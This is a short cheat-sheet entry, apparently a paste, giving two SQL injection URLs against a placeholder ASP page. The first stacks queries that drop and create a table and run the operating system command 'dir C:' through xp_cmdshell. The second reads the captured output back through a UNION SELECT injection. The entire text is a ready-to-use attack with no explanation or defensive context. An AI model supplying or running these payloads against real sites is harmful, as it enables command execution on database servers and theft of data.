xp_cmdshell/UNION SQLi

1. 1) executing xp_cmdshell
2. http://www.target.com/vuln.asp?param=1';IF object_id('result') IS NOT NULL DROP TABLE result; CREATE TABLE result (output varchar(200));INSERT INTO result EXEC xp_cmdshell 'dir C:'--
3.  
4. 2) result retrieval through UNION injection
5. http://www.target.com/vuln.asp?param=-1' UNION ALL SELECT NULL, NULL, output FROM result--